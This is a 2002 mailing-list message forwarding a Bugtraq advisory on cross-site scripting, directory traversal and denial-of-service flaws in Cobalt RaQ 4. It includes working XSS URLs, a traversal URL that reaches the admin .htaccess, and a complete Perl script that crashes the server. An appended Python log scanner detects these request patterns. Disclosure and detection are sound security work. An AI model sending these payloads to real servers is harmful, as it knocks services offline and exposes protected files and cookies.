Who are those guys, publishing a full DoS script?

Jelmer

----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, March 01, 2002 11:23 AM
Subject: [cobalt-security] FWD: Colbalt-RAQ-v4-Bugs&Vulnerabilities
> This appeared in Bugtraq yesterday:
>
> --------------------------------------------------------------------
> From: Alex Hernandez <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Colbalt-RAQ-v4-Bugs&Vulnerabilities
> Date sent: Thu, 28 Feb 2002 09:33:17 -0500
> Send reply to: <[EMAIL PROTECTED]>
>
> ------oOo----------------
> Cobalt RAQ 4 Server Management,
> Cross Site Scripting, Directory Traversal & DoS Vulnerabilities.
> ------oOo----------------
>
> Company Affected: www.cobalt.com & www.sun.com
> Version: RAQ 4 Server Management.
> Download: http://www.cobalt.com/products/raq/index.html
> OS Affected: Linux ALL, Solaris ALL.
>
> Author:
>
> ** Alex Hernandez <[EMAIL PROTECTED]>
> ** Thanks to all the people from Spain and Argentina.
> ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
>
> ----=[Brief Description]=------------
>
> The Sun Cobalt RaQ is a server appliance for Internet Service Providers
> (ISPs). It can host up to 200 individual websites or it can be dedicated
> to a single medium or large customer. This versatility opens up tremendous
> opportunity for service providers to invest in a single piece of hardware
> while migrating business customers up to dedicated servers.
>
> ----=[Summary]=----------------------
>
> Three vulnerabilities exist:
>
> a) Cross Site Scripting.
> b) Traversal vulnerabilities.
> c) Denial Of Service. (Exploit Released)
>
> Cobalt's service.cgi incorrectly handles the incoming search parses;
> incoming HTML tags or JavaScript will be included inside the result
> without them being filtered out for dangerous content. A similar problem
> occurs with x.cgi's inclusion of malicious code inside the resulting
> title search.
>
> The cgi files are open source. A security vulnerability in the
> product allows attackers to insert malicious content into existing web
> pages by exploiting the Cross-Site Scripting Vulnerability.
> Affected Files (cgi's)
>
> alert.cgi
> service.cgi
>
> Workaround:
> 1) Delete service.cgi from the system, or disable its possible execution.
> 2) Delete alert.cgi from the system, or disable its possible execution.
>
> EXAMPLES:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('hello')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Microsoft%20hole')</script>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>
>
> LOCATION:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E
>
> COOKIES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> TAG IMAGES:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
>
> WRITE ON DOCUMENT:
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>
>
> ------oOo--------
>
> Traversal File configuration.
>
> Exploit:
> http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess
>
> # Access file for /usr/admserv/html/.cobalt/admin/ (admin )
> order allow,deny
> allow from all
> require user admin
> Authname CobaltRaQ
> Authtype Basic
>
> The directory by default on the server is "/usr/admserv/html/.cobalt/admin"; you can
> translate to any directory to capture restricted files or passwords and
> user profiles.
>
> ------oOo--------
>
> Denial Of Service.
>
> Proof Of Concept:
>
> Server crashes after sending a very long URL:
>
> Example:
>
> http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA
>
> This crashes the system and the admin needs to restart the service!
> ------oOo-------------
> Exploit Code DoS Cobalt4_DoS.pl
> ------oOo-------------
>
> #!/usr/bin/perl
> #
> # Simple script to send a long 'A's' command to the server,
> # resulting in the server crashing.
> #
> # Cobalt RAQ DoS v4 proof-of-concept exploit.
> # By Alex Hernandez <[EMAIL PROTECTED]> (C)2002.
> #
> # Thanks to all the people from Spain and Argentina.
> # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
> #
> # Usage: perl -x Cobalt4_DoS.pl -s <server>
> #
> # Example:
> #
> # perl -x Cobalt4_DoS.pl -s 10.0.0.1
> #
> # Crash was successful !
> #
>
> use Getopt::Std;
> use IO::Socket;
>
> print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");
> print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
>
> getopts('s:', \%args);
> if(!defined($args{s})){&usage;}
>
> ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
>
> $def = "A";
> $num = "100000";
> $data .= $def x $num;
> $serv = $args{s};
> $port = 81; # maybe you define the port for difference of versions
> $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n";
>
> $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
> $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
> connect(S, $paddr) || die ("Error: $!");
> select(S); $| = 1; select(STDOUT);
> print S "$buf";
>
> print("\nCrash was successful !\n\n");
>
> sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
>
> ------oOo------------------------------------
> Vendor Response:
> The vendor was notified
>
> Posted to the Cobalt security lists:
> [EMAIL PROTECTED] &
> [EMAIL PROTECTED]
>
> http://www.cobalt.com
> Temporary patch:
> Delete the cgi files from the system, or disable their
> possible execution.
>
> Alex Hernandez <[EMAIL PROTECTED]> (c) 2002.
> ------oOo------------------------------------
>
> _______________________________________________
> cobalt-security mailing list
> [EMAIL PROTECTED]
> http://list.cobalt.com/mailman/listinfo/cobalt-security
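Added here as a defender-side illustration, not from the advisory and not Cobalt's code: the three request shapes the forwarded advisory describes (HTML or script in the service.cgi query, a ".." segment reaching the admin .htaccess, and an oversized URL) flagged in web-server access logs. The log lines, regexes, the 2048-byte threshold and the function names are all my own constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common log format: client ident user [timestamp] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# An HTML tag start or a javascript: URL inside a decoded query value
TAG_RE = re.compile(r'<\s*/?[a-z]|javascript\s*:', re.IGNORECASE)
MAX_URI_LEN = 2048  # assumed threshold; tune to the appliance's real traffic


def classify_request(uri):
    """Return the advisory-pattern labels matched by one request URI."""
    findings = []
    parts = urlsplit(uri)
    # Decode first so '..' and '%2e%2e' are treated alike, then look for a '..' segment
    if ".." in unquote(parts.path).split("/"):
        findings.append("traversal")
    # parse_qs percent-decodes values, so <script> and %3Cscript%3E look the same here
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        if any(TAG_RE.search(v) for v in values):
            findings.append("xss")
            break
    if len(uri) > MAX_URI_LEN:
        findings.append("long-uri")
    return findings


def scan_log(text):
    """Return (client, status, findings) for each line matching at least one pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        client, _ts, _method, uri, status = m.groups()
        findings = classify_request(uri)
        if findings:
            hits.append((client, int(status), findings))
    return hits


def sample_log():
    """Constructed log lines for the demo; not taken from any real RaQ."""
    fmt = '10.0.0.9 - - [01/Mar/2002:11:2%d:00 -0500] "GET %s HTTP/1.0" %d 0'
    cgi = "/cgi-bin/.cobalt/alert/service.cgi?service="
    return "\n".join([
        fmt % (0, cgi + "httpd", 200),  # benign status lookup
        fmt % (1, cgi + "%3Cscript%3Ealert(document.cookie)%3C/script%3E", 200),
        fmt % (2, "/.cobalt/sysManage/../admin/.htaccess", 200),
        fmt % (3, cgi + "A" * 3000, 500),
    ])
```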
